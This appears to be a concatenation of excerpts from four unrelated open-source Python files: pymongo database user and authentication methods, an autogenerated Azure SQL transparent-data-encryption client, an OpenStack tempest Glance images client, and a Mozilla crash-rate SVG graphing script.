except OperationFailure as exc:
# MongoDB >= 2.5.3 requires the use of commands to manage
# users.
if exc.code in common.COMMAND_NOT_FOUND_CODES:
self._legacy_add_user(name, password, read_only, **kwargs)
return
# Unauthorized. Attempt to create the user in case of
# localhost exception.
elif exc.code == 13:
self._create_or_update_user(
True, name, password, read_only, **kwargs)
else:
raise
def remove_user(self, name):
"""Remove user `name` from this :class:`Database`.
User `name` will no longer have permissions to access this
:class:`Database`.
:Parameters:
- `name`: the name of the user to remove
"""
try:
cmd = SON([("dropUser", name)])
# Don't send {} as writeConcern.
if self.write_concern.acknowledged and self.write_concern.document:
cmd["writeConcern"] = self.write_concern.document
self.command(cmd)
except OperationFailure as exc:
# See comment in add_user try / except above.
if exc.code in common.COMMAND_NOT_FOUND_CODES:
coll = self.system.users
if not self.write_concern.acknowledged:
coll = coll.with_options(write_concern=WriteConcern())
coll.delete_one({"user": name})
return
raise
def authenticate(self, name, password=None,
source=None, mechanism='DEFAULT', **kwargs):
"""Authenticate to use this database.
Authentication lasts for the life of the underlying client
instance, or until :meth:`logout` is called.
Raises :class:`TypeError` if (required) `name`, (optional) `password`,
or (optional) `source` is not an instance of :class:`basestring`
(:class:`str` in python 3).
.. note::
- This method authenticates the current connection, and
will also cause all new :class:`~socket.socket` connections
in the underlying client instance to be authenticated automatically.
- Authenticating more than once on the same database with different
credentials is not supported. You must call :meth:`logout` before
authenticating with new credentials.
- When sharing a client instance between multiple threads, all
threads will share the authentication. If you need different
authentication profiles for different purposes you must use
distinct client instances.
:Parameters:
- `name`: the name of the user to authenticate.
- `password` (optional): the password of the user to authenticate.
Not used with GSSAPI or MONGODB-X509 authentication.
- `source` (optional): the database to authenticate on. If not
specified the current database is used.
- `mechanism` (optional): See
:data:`~pymongo.auth.MECHANISMS` for options.
By default, use SCRAM-SHA-1 with MongoDB 3.0 and later,
MONGODB-CR (MongoDB Challenge Response protocol) for older servers.
- `authMechanismProperties` (optional): Used to specify
authentication mechanism specific options. To specify the service
name for GSSAPI authentication pass
authMechanismProperties='SERVICE_NAME:<service name>'
.. versionadded:: 2.8
Use SCRAM-SHA-1 with MongoDB 3.0 and later.
.. versionchanged:: 2.5
Added the `source` and `mechanism` parameters. :meth:`authenticate`
now raises a subclass of :class:`~pymongo.errors.PyMongoError` if
authentication fails due to invalid credentials or configuration
issues.
.. mongodoc:: authenticate
"""
if not isinstance(name, string_type):
raise TypeError("name must be an "
"instance of %s" % (string_type.__name__,))
if password is not None and not isinstance(password, string_type):
raise TypeError("password must be an "
"instance of %s" % (string_type.__name__,))
if source is not None and not isinstance(source, string_type):
raise TypeError("source must be an "
"instance of %s" % (string_type.__name__,))
common.validate_auth_mechanism('mechanism', mechanism)
validated_options = {}
for option, value in iteritems(kwargs):
normalized, val = common.validate_auth_option(option, value)
validated_options[normalized] = val
credentials = auth._build_credentials_tuple(
mechanism,
source or self.name,
name,
password,
validated_options)
self.client._cache_credentials(
self.name,
credentials,
connect=True)
return True
def logout(self):
"""Deauthorize use of this database for this client instance."""
# Sockets will be deauthenticated as they are used.
self.client._purge_credentials(self.name)
def dereference(self, dbref, **kwargs):
"""Dereference a :class:`~bson.dbref.DBRef`, getting the
document it points to.
Raises :class:`TypeError` if `dbref` is not an instance of
:class:`~bson.dbref.DBRef`. Returns a document, or ``None`` if
the reference does not point to a valid document. Raises
:class:`ValueError` if `dbref` has a database specified that
is different from the current database.
:Parameters:
- `dbref`: the reference
- `**kwargs` (optional): any additional keyword arguments
are the same as the arguments to
:meth:`~pymongo.collection.Collection.find`.
"""
if not isinstance(dbref, DBRef):
raise TypeError("cannot dereference a %s" % type(dbref))
if dbref.database is not None and dbref.database != self.__name:
raise ValueError("trying to dereference a DBRef that points to "
"another database (%r not %r)" % (dbref.database,
self.__name))
return self[dbref.collection].find_one({"_id": dbref.id}, **kwargs)
def eval(self, code, *args):
"""Evaluate a JavaScript expression in MongoDB.
Useful if you need to touch a lot of data lightly; in such a
scenario the network transfer of the data could be a
bottleneck. The `code` argument must be a JavaScript
function. Additional positional arguments will be passed to
that function when it is run on the server.
Raises :class:`TypeError` if `code` is not an instance of
:class:`basestring` (:class:`str` in python 3) or `Code`.
Raises :class:`~pymongo.errors.OperationFailure` if the eval
fails. Returns the result of the evaluation.
:Parameters:
- `code`: string representation of JavaScript code to be
evaluated
- `args` (optional): additional positional arguments are
passed to the `code` being evaluated
"""
if not isinstance(code, Code):
code = Code(code)
result = self.command("$eval", code, args=args)
return result.get("retval", None)
def __call__(self, *args, **kwargs):
"""This is only here so that some API misusages are easier to debug.
"""
raise TypeError("'Database' object is not callable. If you meant to "
"call the '%s' method on a '%s' object it is "
"failing because no such method exists." % (
self.__name, self.__client.__class__.__name__))
class SystemJS(object):
"""Helper class for dealing with stored JavaScript.
"""
def __init__(self, database):
"""Get a system js helper for the database `database`.
An instance of :class:`SystemJS` can be created with an instance
of :class:`Database` through :attr:`Database.system_js`,
manual instantiation of this class should not be necessary.
:class:`SystemJS` instances allow for easy manipulation and
access to server-side JavaScript:
.. doctest::
>>> db.system_js.add1 = "function (x) { return x + 1; }"
>>> db.system.js.find({"_id": "add1"}).count()
1
>>> db.system_js.add1(5)
6.0
>>> del db.system_js.add1
>>> db.system.js.find({"_id": "add1"}).count()
0
"""
if not database.write_concern.acknowledged:
database = database.client.get_database(
database.name, write_concern=WriteConcern())
# can't just assign it since we've overridden __setattr__
object.__setattr__(self, "_db", database)
def __setattr__(self, name, code):
self._db.system.js.replace_one(
{"_id": name}, {"_id": name, "value": Code(code)}, True)
def __setitem__(self, name, code):
self.__setattr__(name, code)
def __delattr__(self, name):
self._db.system.js.delete_one({"_id": name})
def __delitem__(self, name):
self.__delattr__(name)
def __getattr__(self, name):
return lambda *args: self._db.eval(Code("function() { "
"return this[name].apply("
"this, arguments); }",
scope={'name': name}), *args)
def __getitem__(self, name):
return self.__getattr__(name)
def list(self):
"""Get a list of the names of the functions stored in this database."""
return [x["_id"] for x in self._db.system.js.find(projection=["_id"])]
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from msrest import Serializer
from .. import models as _models
from .._vendor import _convert_request, _format_url_section
T = TypeVar('T')
JSONType = Any
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_get_request(
resource_group_name: str,
managed_instance_name: str,
database_name: str,
tde_name: Union[str, "_models.TransparentDataEncryptionName"],
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
api_version = "2020-11-01-preview"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/managedInstances/{managedInstanceName}/databases/{databaseName}/transparentDataEncryption/{tdeName}')
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"managedInstanceName": _SERIALIZER.url("managed_instance_name", managed_instance_name, 'str'),
"databaseName": _SERIALIZER.url("database_name", database_name, 'str'),
"tdeName": _SERIALIZER.url("tde_name", tde_name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_create_or_update_request(
resource_group_name: str,
managed_instance_name: str,
database_name: str,
tde_name: Union[str, "_models.TransparentDataEncryptionName"],
subscription_id: str,
*,
json: JSONType = None,
content: Any = None,
**kwargs: Any
) -> HttpRequest:
content_type = kwargs.pop('content_type', None) # type: Optional[str]
api_version = "2020-11-01-preview"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/managedInstances/{managedInstanceName}/databases/{databaseName}/transparentDataEncryption/{tdeName}')
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"managedInstanceName": _SERIALIZER.url("managed_instance_name", managed_instance_name, 'str'),
"databaseName": _SERIALIZER.url("database_name", database_name, 'str'),
"tdeName": _SERIALIZER.url("tde_name", tde_name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PUT",
url=url,
params=query_parameters,
headers=header_parameters,
json=json,
content=content,
**kwargs
)
def build_list_by_database_request(
resource_group_name: str,
managed_instance_name: str,
database_name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
api_version = "2020-11-01-preview"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/managedInstances/{managedInstanceName}/databases/{databaseName}/transparentDataEncryption')
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"managedInstanceName": _SERIALIZER.url("managed_instance_name", managed_instance_name, 'str'),
"databaseName": _SERIALIZER.url("database_name", database_name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
class ManagedDatabaseTransparentDataEncryptionOperations(object):
"""ManagedDatabaseTransparentDataEncryptionOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.sql.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace
def get(
self,
resource_group_name: str,
managed_instance_name: str,
database_name: str,
tde_name: Union[str, "_models.TransparentDataEncryptionName"],
**kwargs: Any
) -> "_models.ManagedTransparentDataEncryption":
"""Gets a managed database's transparent data encryption.
:param resource_group_name: The name of the resource group that contains the resource. You can
obtain this value from the Azure Resource Manager API or the portal.
:type resource_group_name: str
:param managed_instance_name: The name of the managed instance.
:type managed_instance_name: str
:param database_name: The name of the managed database for which the transparent data
encryption is defined.
:type database_name: str
:param tde_name: The name of the transparent data encryption configuration.
:type tde_name: str or ~azure.mgmt.sql.models.TransparentDataEncryptionName
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ManagedTransparentDataEncryption, or the result of cls(response)
:rtype: ~azure.mgmt.sql.models.ManagedTransparentDataEncryption
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ManagedTransparentDataEncryption"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
resource_group_name=resource_group_name,
managed_instance_name=managed_instance_name,
database_name=database_name,
tde_name=tde_name,
subscription_id=self._config.subscription_id,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ManagedTransparentDataEncryption', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/managedInstances/{managedInstanceName}/databases/{databaseName}/transparentDataEncryption/{tdeName}'} # type: ignore
@distributed_trace
def create_or_update(
self,
resource_group_name: str,
managed_instance_name: str,
database_name: str,
tde_name: Union[str, "_models.TransparentDataEncryptionName"],
parameters: "_models.ManagedTransparentDataEncryption",
**kwargs: Any
) -> "_models.ManagedTransparentDataEncryption":
"""Updates a database's transparent data encryption configuration.
:param resource_group_name: The name of the resource group that contains the resource. You can
obtain this value from the Azure Resource Manager API or the portal.
:type resource_group_name: str
:param managed_instance_name: The name of the managed instance.
:type managed_instance_name: str
:param database_name: The name of the managed database for which the security alert policy is
defined.
:type database_name: str
:param tde_name: The name of the transparent data encryption configuration.
:type tde_name: str or ~azure.mgmt.sql.models.TransparentDataEncryptionName
:param parameters: The database transparent data encryption.
:type parameters: ~azure.mgmt.sql.models.ManagedTransparentDataEncryption
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ManagedTransparentDataEncryption, or the result of cls(response)
:rtype: ~azure.mgmt.sql.models.ManagedTransparentDataEncryption
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ManagedTransparentDataEncryption"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'ManagedTransparentDataEncryption')
request = build_create_or_update_request(
resource_group_name=resource_group_name,
managed_instance_name=managed_instance_name,
database_name=database_name,
tde_name=tde_name,
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self.create_or_update.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('ManagedTransparentDataEncryption', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('ManagedTransparentDataEncryption', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/managedInstances/{managedInstanceName}/databases/{databaseName}/transparentDataEncryption/{tdeName}'} # type: ignore
@distributed_trace
def list_by_database(
self,
resource_group_name: str,
managed_instance_name: str,
database_name: str,
**kwargs: Any
) -> Iterable["_models.ManagedTransparentDataEncryptionListResult"]:
"""Gets a list of managed database's transparent data encryptions.
:param resource_group_name: The name of the resource group that contains the resource. You can
obtain this value from the Azure Resource Manager API or the portal.
:type resource_group_name: str
:param managed_instance_name: The name of the managed instance.
:type managed_instance_name: str
:param database_name: The name of the managed database for which the transparent data
encryption is defined.
:type database_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ManagedTransparentDataEncryptionListResult or the
result of cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.sql.models.ManagedTransparentDataEncryptionListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ManagedTransparentDataEncryptionListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_database_request(
resource_group_name=resource_group_name,
managed_instance_name=managed_instance_name,
database_name=database_name,
subscription_id=self._config.subscription_id,
template_url=self.list_by_database.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_by_database_request(
resource_group_name=resource_group_name,
managed_instance_name=managed_instance_name,
database_name=database_name,
subscription_id=self._config.subscription_id,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("ManagedTransparentDataEncryptionListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_database.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/managedInstances/{managedInstanceName}/databases/{databaseName}/transparentDataEncryption'} # type: ignore
|
|
# Copyright 2013 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import errno
import os
import time
from oslo_log import log as logging
from oslo_serialization import jsonutils as json
import six
from six.moves.urllib import parse as urllib
from tempest.common import glance_http
from tempest import exceptions
from tempest.lib.common import rest_client
from tempest.lib.common.utils import misc as misc_utils
from tempest.lib import exceptions as lib_exc
LOG = logging.getLogger(__name__)
class ImagesClient(rest_client.RestClient):
def __init__(self, auth_provider, catalog_type, region, **kwargs):
super(ImagesClient, self).__init__(
auth_provider, catalog_type, region, **kwargs)
self._http = None
self.dscv = kwargs.get("disable_ssl_certificate_validation")
self.ca_certs = kwargs.get("ca_certs")
def _image_meta_from_headers(self, headers):
meta = {'properties': {}}
for key, value in six.iteritems(headers):
if key.startswith('x-image-meta-property-'):
_key = key[22:]
meta['properties'][_key] = value
elif key.startswith('x-image-meta-'):
_key = key[13:]
meta[_key] = value
for key in ['is_public', 'protected', 'deleted']:
if key in meta:
meta[key] = meta[key].strip().lower() in ('t', 'true', 'yes',
'1')
for key in ['size', 'min_ram', 'min_disk']:
if key in meta:
try:
meta[key] = int(meta[key])
except ValueError:
pass
return meta
def _image_meta_to_headers(self, fields):
headers = {}
fields_copy = copy.deepcopy(fields)
copy_from = fields_copy.pop('copy_from', None)
if copy_from is not None:
headers['x-glance-api-copy-from'] = copy_from
for key, value in six.iteritems(fields_copy.pop('properties', {})):
headers['x-image-meta-property-%s' % key] = str(value)
for key, value in six.iteritems(fields_copy.pop('api', {})):
headers['x-glance-api-property-%s' % key] = str(value)
for key, value in six.iteritems(fields_copy):
headers['x-image-meta-%s' % key] = str(value)
return headers
def _get_file_size(self, obj):
"""Analyze file-like object and attempt to determine its size.
:param obj: file-like object, typically redirected from stdin.
:retval The file's size or None if it cannot be determined.
"""
# For large images, we need to supply the size of the
# image file. See LP Bugs #827660 and #845788.
if hasattr(obj, 'seek') and hasattr(obj, 'tell'):
try:
obj.seek(0, os.SEEK_END)
obj_size = obj.tell()
obj.seek(0)
return obj_size
except IOError as e:
if e.errno == errno.ESPIPE:
# Illegal seek. This means the user is trying
# to pipe image data to the client, e.g.
# echo testdata | bin/glance add blah..., or
# that stdin is empty, or that a file-like
# object which doesn't support 'seek/tell' has
# been supplied.
return None
else:
raise
else:
# Cannot determine size of input image
return None
def _get_http(self):
return glance_http.HTTPClient(auth_provider=self.auth_provider,
filters=self.filters,
insecure=self.dscv,
ca_certs=self.ca_certs)
def _create_with_data(self, headers, data):
resp, body_iter = self.http.raw_request('POST', '/v1/images',
headers=headers, body=data)
self._error_checker('POST', '/v1/images', headers, data, resp,
body_iter)
body = json.loads(''.join([c for c in body_iter]))
return rest_client.ResponseBody(resp, body)
def _update_with_data(self, image_id, headers, data):
url = '/v1/images/%s' % image_id
resp, body_iter = self.http.raw_request('PUT', url, headers=headers,
body=data)
self._error_checker('PUT', url, headers, data,
resp, body_iter)
body = json.loads(''.join([c for c in body_iter]))
return rest_client.ResponseBody(resp, body)
@property
def http(self):
if self._http is None:
self._http = self._get_http()
return self._http
def create_image(self, **kwargs):
headers = {}
data = kwargs.pop('data', None)
headers.update(self._image_meta_to_headers(kwargs))
if data is not None:
return self._create_with_data(headers, data)
resp, body = self.post('v1/images', None, headers)
self.expected_success(201, resp.status)
body = json.loads(body)
return rest_client.ResponseBody(resp, body)
def update_image(self, image_id, **kwargs):
headers = {}
data = kwargs.pop('data', None)
headers.update(self._image_meta_to_headers(kwargs))
if data is not None:
return self._update_with_data(image_id, headers, data)
url = 'v1/images/%s' % image_id
resp, body = self.put(url, None, headers)
self.expected_success(200, resp.status)
body = json.loads(body)
return rest_client.ResponseBody(resp, body)
def delete_image(self, image_id):
url = 'v1/images/%s' % image_id
resp, body = self.delete(url)
self.expected_success(200, resp.status)
return rest_client.ResponseBody(resp, body)
def list_images(self, detail=False, **kwargs):
"""Return a list of all images filtered by input parameters.
Available params: see http://developer.openstack.org/
api-ref-image-v1.html#listImage-v1
Most parameters except the following are passed to the API without
any changes.
:param changes_since: The name is changed to changes-since
"""
url = 'v1/images'
if detail:
url += '/detail'
properties = kwargs.pop('properties', {})
for key, value in six.iteritems(properties):
kwargs['property-%s' % key] = value
if kwargs.get('changes_since'):
kwargs['changes-since'] = kwargs.pop('changes_since')
if len(kwargs) > 0:
url += '?%s' % urllib.urlencode(kwargs)
resp, body = self.get(url)
self.expected_success(200, resp.status)
body = json.loads(body)
return rest_client.ResponseBody(resp, body)
def get_image_meta(self, image_id):
url = 'v1/images/%s' % image_id
resp, __ = self.head(url)
self.expected_success(200, resp.status)
body = self._image_meta_from_headers(resp)
return rest_client.ResponseBody(resp, body)
def show_image(self, image_id):
url = 'v1/images/%s' % image_id
resp, body = self.get(url)
self.expected_success(200, resp.status)
return rest_client.ResponseBodyData(resp, body)
def is_resource_deleted(self, id):
try:
if self.get_image_meta(id)['status'] == 'deleted':
return True
except lib_exc.NotFound:
return True
return False
@property
def resource_type(self):
"""Returns the primary type of resource this client works with."""
return 'image_meta'
def list_image_members(self, image_id):
url = 'v1/images/%s/members' % image_id
resp, body = self.get(url)
self.expected_success(200, resp.status)
body = json.loads(body)
return rest_client.ResponseBody(resp, body)
def list_shared_images(self, tenant_id):
"""List shared images with the specified tenant"""
url = 'v1/shared-images/%s' % tenant_id
resp, body = self.get(url)
self.expected_success(200, resp.status)
body = json.loads(body)
return rest_client.ResponseBody(resp, body)
def add_member(self, member_id, image_id, **kwargs):
"""Add a member to an image.
Available params: see http://developer.openstack.org/
api-ref-image-v1.html#addMember-v1
"""
url = 'v1/images/%s/members/%s' % (image_id, member_id)
body = json.dumps({'member': kwargs})
resp, __ = self.put(url, body)
self.expected_success(204, resp.status)
return rest_client.ResponseBody(resp)
def delete_member(self, member_id, image_id):
url = 'v1/images/%s/members/%s' % (image_id, member_id)
resp, __ = self.delete(url)
self.expected_success(204, resp.status)
return rest_client.ResponseBody(resp)
# NOTE(afazekas): just for the wait function
def _get_image_status(self, image_id):
meta = self.get_image_meta(image_id)
status = meta['status']
return status
# NOTE(afazkas): Wait reinvented again. It is not in the correct layer
def wait_for_image_status(self, image_id, status):
"""Waits for a Image to reach a given status."""
start_time = time.time()
old_value = value = self._get_image_status(image_id)
while True:
dtime = time.time() - start_time
time.sleep(self.build_interval)
if value != old_value:
LOG.info('Value transition from "%s" to "%s"'
'in %d second(s).', old_value,
value, dtime)
if value == status:
return value
if value == 'killed':
raise exceptions.ImageKilledException(image_id=image_id,
status=status)
if dtime > self.build_timeout:
message = ('Time Limit Exceeded! (%ds)'
'while waiting for %s, '
'but we got %s.' %
(self.build_timeout, status, value))
caller = misc_utils.find_test_caller()
if caller:
message = '(%s) %s' % (caller, message)
raise exceptions.TimeoutException(message)
time.sleep(self.build_interval)
old_value = value
value = self._get_image_status(image_id)
|
|
import os, sys
import csv
import svgwrite
import svggraph
from collections import namedtuple
from datetime import datetime, timedelta
from time import mktime
def float_xrange(start, stop, step):
c = start
while c < stop:
yield c
c += step
RowType = namedtuple('RowType', ('buildid', 'users', 'crashcount'))
def intconvert(s):
if s == '':
return 0
return int(s)
def buildid_to_datetime(buildid):
return datetime(int(buildid[0:4]), int(buildid[4:6]), int(buildid[6:8]),
int(buildid[8:10]), int(buildid[10:12]))
height = 350
width_per_day = 10
dotSize = 8
def produce_graph(builds, channel, label, fd):
mindate = buildid_to_datetime(builds[0].buildid) - timedelta(hours=12)
maxdate = buildid_to_datetime(builds[-1].buildid) + timedelta(hours=12)
maxratio = max(float(build.crashcount) / build.users * 100 for build in builds if build.users != 0)
graph_width = (maxdate - mindate).days * width_per_day
d = svgwrite.Drawing(id='graphRoot',
viewBox='0 0 %s %s' % (graph_width,
height),
debug=False)
d['width'] = str(graph_width)
d['height'] = str(height)
plot = svggraph.Plot(d, graph_width, height,
mktime(mindate.timetuple()), 0,
mktime(maxdate.timetuple()), maxratio)
plot.config.yaxis.labelRotate = 0
plot.config.yaxis.labelDepth = 35
plot.config.xaxis.labelRotate = 90
plot.config.xaxis.labelDepth = 125
d.add(plot.root)
plot.drawAxes()
plot.printTicks('x', ((mktime(buildid_to_datetime(build.buildid).timetuple()), build.buildid) for build in builds))
plot.printTicks('y', ((t, str(t)) for t in float_xrange(0, maxratio, .05)))
plot.printXAxisLabel(label)
plot.printYAxisLabel("Crashes/100ADI")
branches = {
'nightly': [
(datetime(2013, 8, 5), "Firefox 26.0a1"),
(datetime(2013, 9, 16), "Firefox 27.0a1"),
(datetime(2013, 10, 29), "Firefox 28.0a1"),
(datetime(2013, 12, 10), "Firefox 29.0a1"),
],
'aurora': [
(datetime(2013, 8, 5), "Firefox 25.0a2"),
(datetime(2013, 9, 16), "Firefox 26.0a2"),
(datetime(2013, 10, 29), "Firefox 27.0a2"),
(datetime(2013, 12, 10), "Firefox 28.0a2"),
],
}
for date, label in branches[channel]:
x, miny = plot.transform(mktime(date.timetuple()), plot.miny)
temp, maxy = plot.transform(0, plot.maxy)
plot.root.add(d.line((x, miny), (x, maxy + plot.fontHeight()), class_='releaseMarker'))
plot.root.add(d.text(label, (x, maxy + plot.fontHeight()), class_='releaseLabel'))
for build in builds:
if build.users == 0:
continue
x, y = plot.transform(mktime(buildid_to_datetime(build.buildid).timetuple()),
float(build.crashcount) / build.users * 100)
mark = plot.root.add(d.circle((x, y), dotSize / 2, class_="mark"))
mark['buildid'] = build.buildid
mark['users'] = build.users
mark['crashcount'] = build.crashcount
detailsWidth = 180
fontHeight = plot.fontHeight()
detailsHeight = fontHeight * 5
g = d.add(d.g(id='details'))
g.translate(0,0)
g.add(d.path(('M', 0, 0,
'L', 10, 15,
'L', 10, detailsHeight,
'L', detailsWidth, detailsHeight,
'L', detailsWidth, 10,
'L', 15, 10,
'Z'), id='detailBox')).scale(1)
g = g.add(d.g(id='detailText'))
g.translate(12, 2 + fontHeight)
g.add(d.text('buildid', (0, fontHeight), id='detailsBuildID', class_='detailsText'))
g.add(d.text('users', (0, fontHeight * 2), id='detailsUsers', class_='detailsText'))
g.add(d.text('crashcount', (0, fontHeight * 3), id='detailsCrashCount', class_='detailsText'))
d.add(d.style("""
svg {
font-family: sans-serif;
}
.border {
stroke: black;
stroke-width: 2;
fill: none;
}
.tick {
stroke: black;
stroke-width: 2;
}
.crossTick {
stroke: #444;
stroke-width: 1;
}
.tickLabel,
.axisLabel {
fill: black;
font-size: %(fontSize)dpt;
}
.axisLabel {
font-weight: bold;
text-anchor: middle;
}
.tickLabel {
dominant-baseline: middle;
}
.tickLabel.xaxis {
text-anchor: start;
}
.tickLabel.yaxis {
text-anchor: end;
}
.releaseMarker {
stroke: #5F5;
stroke-width: 3;
}
.releaseLabel {
fill: #060;
text-anchor: middle;
}
.mark {
fill: #5D3799;
}
.mark:hover {
fill: #9b5cff;
}
#detailBox {
fill: #e3e1af;
stroke: #919071;
stroke-width: 1;
}
#details {
visibility: hidden;
opacity: 0;
transition: visibility 0s linear 0.2s,opacity 0.2s ease-in-out;
}
#details.visible {
visibility: visible;
opacity: 1;
transition: opacity 0.2s ease-in-out;
}
#details .detailsText {
font-size: %(fontSize)dpt;
}
""" % {'fontSize': plot.config.fontSize}))
d.add(d.script(type='text/javascript',
href='https://crash-analysis.mozilla.com/bsmedberg/d3.v3.min.js'))
d.add(d.script(type='text/javascript',
content="""
d3.selectAll('#graphRoot').on('click', function() {
if (d3.event.target == d3.event.currentTarget) {
